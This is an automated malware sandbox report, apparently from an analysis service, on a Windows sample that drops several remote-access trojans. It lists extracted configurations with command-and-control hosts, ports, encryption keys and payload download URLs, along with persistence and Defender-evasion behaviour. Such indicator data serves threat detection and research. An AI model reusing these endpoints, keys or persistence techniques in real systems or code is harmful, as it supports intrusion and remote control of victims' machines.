Resubmissions
31-01-2025 20:51
250131-zngnysynhl 1022-01-2025 17:19
250122-vv8c2awqf1 1022-01-2025 16:20
250122-ts986swjel 1022-01-2025 13:44
250122-q2a9nayng1 1022-01-2025 13:43
250122-q1jjmszmel 1022-01-2025 13:42
250122-qz519ayncz 1021-01-2025 02:07
250121-cjzbwa1jhp 1020-01-2025 18:36
250120-w88fmasqfy 1020-01-2025 18:27
250120-w3q96asnh1 10Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
31-01-2025 20:51
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10v2004-20250129-en
General
-
Target
4363463463464363463463463.exe
-
Size
764KB
-
MD5
85e3d4ac5a6ef32fb93764c090ef32b7
-
SHA1
adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52
-
SHA256
4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1
-
SHA512
a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab
-
SSDEEP
12288:6MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Ufbj:6nsJ39LyjbJkQFMhmC+6GD9mH
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
asyncrat
0.5.8
Default
18.ip.gl.ply.gg:6606
18.ip.gl.ply.gg:7707
18.ip.gl.ply.gg:8808
18.ip.gl.ply.gg:9028
14.243.221.170:3322
2.tcp.eu.ngrok.io:19695
HyFTucy74RnH
-
delay
3
-
install
true
-
install_file
Discord.exe
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Office04
hilol.zapto.org:20
11bbf22e-826e-486b-b024-adbd86228a9e
-
encryption_key
7A589EDBC6A581E125BF830EF0D05FC74BB75E30
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
ctfmon
-
subdirectory
SubDir
Extracted
quasar
1.3.0.0
Office04
20.107.53.25:25535
QSR_MUTEX_zQ0poF2lHhCSZKSUZ3
-
encryption_key
E2xbpJ93MnABcIqioTDL
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
Aquarius
192.168.8.103:4782
192.168.8.105:4782
192.168.8.114:4782
a198a147-9efc-419d-9539-bac2108dc109
-
encryption_key
4CF458F992C472DE78F317085B34A8A1747FC32D
-
install_name
WindowsDataUpdater.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
WindowsDataUpdater
-
subdirectory
WinBioData
Extracted
quasar
1.4.1
newoffice
117.18.7.76:3782
d908c8ed-ea88-484e-a3d2-dcbe66ac7cfc
-
encryption_key
FD2DE574AF7E363A5304DF85B3475F93A948C103
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Client Startup
-
subdirectory
SubDir
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
XClient.exe
-
pastebin_url
https://pastebin.com/raw/RpncwxSs
Signatures
-
Asyncrat family
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/memory/444-4946-0x0000000001200000-0x0000000001218000-memory.dmp family_xworm behavioral1/files/0x0003000000023a5d-5365.dat family_xworm behavioral1/memory/4152-5690-0x0000000000E60000-0x0000000000E78000-memory.dmp family_xworm -
Quasar family
-
Quasar payload 16 IoCs
resource yara_rule behavioral1/files/0x00110000000191fd-374.dat family_quasar behavioral1/memory/1908-384-0x00000000009F0000-0x0000000000D14000-memory.dmp family_quasar behavioral1/memory/2792-400-0x0000000000E50000-0x0000000001174000-memory.dmp family_quasar behavioral1/memory/2376-439-0x0000000001130000-0x0000000001454000-memory.dmp family_quasar behavioral1/memory/1464-465-0x0000000000110000-0x0000000000434000-memory.dmp family_quasar behavioral1/files/0x0007000000019263-480.dat family_quasar behavioral1/memory/2356-482-0x0000000000B40000-0x0000000000B9E000-memory.dmp family_quasar behavioral1/files/0x0005000000019618-519.dat family_quasar behavioral1/memory/1412-544-0x0000000000960000-0x0000000000C84000-memory.dmp family_quasar behavioral1/memory/2036-674-0x0000000000E30000-0x0000000001154000-memory.dmp family_quasar behavioral1/memory/1472-1407-0x0000000001140000-0x0000000001464000-memory.dmp family_quasar behavioral1/memory/2824-2209-0x0000000001150000-0x0000000001474000-memory.dmp family_quasar behavioral1/memory/3304-4931-0x0000000005A70000-0x0000000005D94000-memory.dmp family_quasar behavioral1/memory/4276-5071-0x0000000000380000-0x00000000006A4000-memory.dmp family_quasar behavioral1/memory/1700-5823-0x0000000000190000-0x00000000004B4000-memory.dmp family_quasar behavioral1/memory/5064-6555-0x00000000011C0000-0x00000000014E4000-memory.dmp family_quasar -
Xred family
-
Xworm family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/files/0x00050000000191f3-294.dat family_asyncrat behavioral1/files/0x0005000000019278-387.dat family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3784 powershell.exe 4164 powershell.exe 4416 powershell.exe 4288 powershell.exe -
Downloads MZ/PE file 16 IoCs
flow pid Process 33 552 ._cache_4363463463464363463463463.exe 46 1140 jeditor.exe 51 552 ._cache_4363463463464363463463463.exe 72 552 ._cache_4363463463464363463463463.exe 100 2596 ._cache_Synaptics.exe 127 552 ._cache_4363463463464363463463463.exe 27 2596 ._cache_Synaptics.exe 27 2596 ._cache_Synaptics.exe 27 2596 ._cache_Synaptics.exe 27 2596 ._cache_Synaptics.exe 31 552 ._cache_4363463463464363463463463.exe 31 552 ._cache_4363463463464363463463463.exe 39 1212 jeditor.exe 41 1212 jeditor.exe 43 2868 WEBDOWN.EXE 123 552 ._cache_4363463463464363463463463.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 552 ._cache_4363463463464363463463463.exe 2656 Synaptics.exe 2596 ._cache_Synaptics.exe 2908 Discord2.exe 2404 Discord.exe 2624 MajesticExec.exe 1908 skibidi.exe 1212 jeditor.exe 1860 temp.exe 2792 Client.exe 2316 roIrMC.exe 2868 WEBDOWN.EXE 2376 Client.exe 1140 jeditor.exe 1464 Client.exe 2356 Client-built.exe 2780 svchost.exe 2768 Aquarius.exe 776 WindowsDefenderUpdater.exe 1412 WindowsDataUpdater.exe 1048 java.exe 756 WindowsDefenderUpdater.exe 688 WindowsDataUpdater.exe 2244 WindowsDefenderUpdater.exe 1416 java.exe 1700 WindowsDefenderUpdater.exe 2036 Client.exe 1608 WindowsDataUpdater.exe 2028 WindowsDefenderUpdater.exe 2216 java.exe 2660 WindowsDefenderUpdater.exe 1148 Process not Found 2372 WindowsDefenderUpdater.exe 2932 java.exe 2760 WindowsDataUpdater.exe 2924 WindowsDefenderUpdater.exe 2092 WindowsDefenderUpdater.exe 1052 WindowsDataUpdater.exe 2480 java.exe 2284 WindowsDefenderUpdater.exe 2132 WindowsDefenderUpdater.exe 3000 WindowsDataUpdater.exe 1852 java.exe 1500 WindowsDefenderUpdater.exe 1900 WindowsDefenderUpdater.exe 1432 java.exe 1772 WindowsDataUpdater.exe 2452 WindowsDefenderUpdater.exe 472 WindowsDefenderUpdater.exe 2492 WindowsDataUpdater.exe 1536 java.exe 1532 WindowsDefenderUpdater.exe 1760 WindowsDefenderUpdater.exe 2308 java.exe 2232 WindowsDataUpdater.exe 2020 WindowsDefenderUpdater.exe 924 WindowsDefenderUpdater.exe 1684 WindowsDataUpdater.exe 2696 java.exe 1960 WindowsDefenderUpdater.exe 1268 WindowsDefenderUpdater.exe 1680 java.exe 3000 WindowsDataUpdater.exe 2500 WindowsDefenderUpdater.exe -
Loads dropped DLL 64 IoCs
pid Process 2760 4363463463464363463463463.exe 2760 4363463463464363463463463.exe 2760 4363463463464363463463463.exe 2656 Synaptics.exe 2656 Synaptics.exe 2596 ._cache_Synaptics.exe 2196 cmd.exe 552 ._cache_4363463463464363463463463.exe 2596 ._cache_Synaptics.exe 552 ._cache_4363463463464363463463463.exe 552 ._cache_4363463463464363463463463.exe 776 cmd.exe 1212 jeditor.exe 2868 WEBDOWN.EXE 2596 ._cache_Synaptics.exe 552 ._cache_4363463463464363463463463.exe 552 ._cache_4363463463464363463463463.exe 552 ._cache_4363463463464363463463463.exe 2084 cmd.exe 2084 cmd.exe 2084 cmd.exe 756 WindowsDefenderUpdater.exe 756 WindowsDefenderUpdater.exe 756 WindowsDefenderUpdater.exe 756 WindowsDefenderUpdater.exe 756 WindowsDefenderUpdater.exe 756 WindowsDefenderUpdater.exe 756 WindowsDefenderUpdater.exe 2348 cmd.exe 1700 WindowsDefenderUpdater.exe 1700 WindowsDefenderUpdater.exe 1700 WindowsDefenderUpdater.exe 1700 WindowsDefenderUpdater.exe 1700 WindowsDefenderUpdater.exe 1700 WindowsDefenderUpdater.exe 1700 WindowsDefenderUpdater.exe 2268 cmd.exe 2660 WindowsDefenderUpdater.exe 2660 WindowsDefenderUpdater.exe 2660 WindowsDefenderUpdater.exe 2660 WindowsDefenderUpdater.exe 2660 WindowsDefenderUpdater.exe 2660 WindowsDefenderUpdater.exe 2660 WindowsDefenderUpdater.exe 1504 cmd.exe 2924 WindowsDefenderUpdater.exe 2924 WindowsDefenderUpdater.exe 2924 WindowsDefenderUpdater.exe 2924 WindowsDefenderUpdater.exe 2924 WindowsDefenderUpdater.exe 2924 WindowsDefenderUpdater.exe 2924 WindowsDefenderUpdater.exe 1572 cmd.exe 2284 WindowsDefenderUpdater.exe 2284 WindowsDefenderUpdater.exe 2284 WindowsDefenderUpdater.exe 2284 WindowsDefenderUpdater.exe 2284 WindowsDefenderUpdater.exe 2284 WindowsDefenderUpdater.exe 2284 WindowsDefenderUpdater.exe 764 cmd.exe 1500 WindowsDefenderUpdater.exe 1500 WindowsDefenderUpdater.exe 1500 WindowsDefenderUpdater.exe -
resource yara_rule behavioral1/files/0x0006000000019280-485.dat vmprotect behavioral1/memory/2780-494-0x000000013F540000-0x000000013FAE3000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
flow ioc 119 pastebin.com 129 pastebin.com 27 raw.githubusercontent.com 31 raw.githubusercontent.com 111 pastebin.com 113 pastebin.com 117 pastebin.com 136 pastebin.com 26 raw.githubusercontent.com 92 2.tcp.eu.ngrok.io 110 pastebin.com 115 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 53 ip-api.com -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\java.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created 